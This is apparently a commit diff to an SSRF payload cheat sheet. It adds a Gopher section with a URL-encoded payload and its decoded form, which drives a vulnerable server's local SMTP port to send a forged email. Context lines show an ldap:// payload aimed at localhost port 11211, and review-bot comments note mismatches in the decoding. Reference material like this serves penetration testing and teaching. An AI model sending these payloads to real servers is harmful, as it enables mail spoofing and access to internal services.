SSRF - Gopher Protocol
parent
1ca215d5d7
commit
e7cb8a2ce1
|
@ -94,6 +94,26 @@ Ldap://
|
|||
ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
|
||||
```
|
||||
|
||||
Gopher://
|
||||
```
|
||||
ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
|
||||
|
||||
will make a request like
|
||||
HELO localhost
|
||||
MAIL FROM:<hacker@site.com>
|
||||
RCPT TO:<victim@site.com>
|
||||
DATA
|
||||
From: [Hacker] <hacker@site.com>
|
||||
To: <victime@site.com>
|
||||
Date: Tue, 15 Sep 2017 17:20:26 -0400
|
||||
Subject: Ah Ah AH
|
||||
|
||||
You didn't say the magic word !
|
||||
|
||||
|
||||
.
|
||||
QUIT
|
||||
```
|
||||
|
||||
## Thanks to
|
||||
* [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)
|
||||
|
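Review bot: In the Gopher block, the decoded request under "will make a request like" is not a faithful decode of the URL above it: the URL encodes `Subject%3A%20AH%20AH%20AH` while the decoded text reads `Subject: Ah Ah AH`, and the `x` in `/xHELO` has no counterpart in the decoded output. Please make the decoded text match the URL exactly and add one sentence explaining why the character before `HELO` disappears and why line breaks are written `%250d%250a` here when the Ldap example just above uses single-encoded `%0a`. Also, `RCPT TO` names `victim@site.com` but the `To:` header names `victime@site.com`; if that is a typo, correct it in both the URL and the decoded text. The section would read more clearly with the URL and the decoded request in separate fences and "will make a request like" as prose between them, since the sentence currently sits inside the code block.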
@ -101,3 +121,4 @@ ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
|
|||
* [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! Orange Tsai](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)
|
||||
* [SSRF Tips - xl7dev](http://blog.safebuff.com/2016/07/03/SSRF-Tips/)
|
||||
* [SSRF in https://imgur.com/vidgif/url](https://hackerone.com/reports/115748)
|
||||
* [Les Server Side Request Forgery : Comment contourner un pare-feu - @Geluchat](https://www.dailysecurity.fr/server-side-request-forgery/)
|
||||
|
|
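Review bot: The hunk header (`-101,3 +121,4`) shows one reference added to this list, but nothing indicates which source the new Gopher SMTP example is taken from. Please state in the commit message or beside the entry which reference covers it, and mark the dailysecurity.fr entry as French-language, since every other title in the visible list is in English.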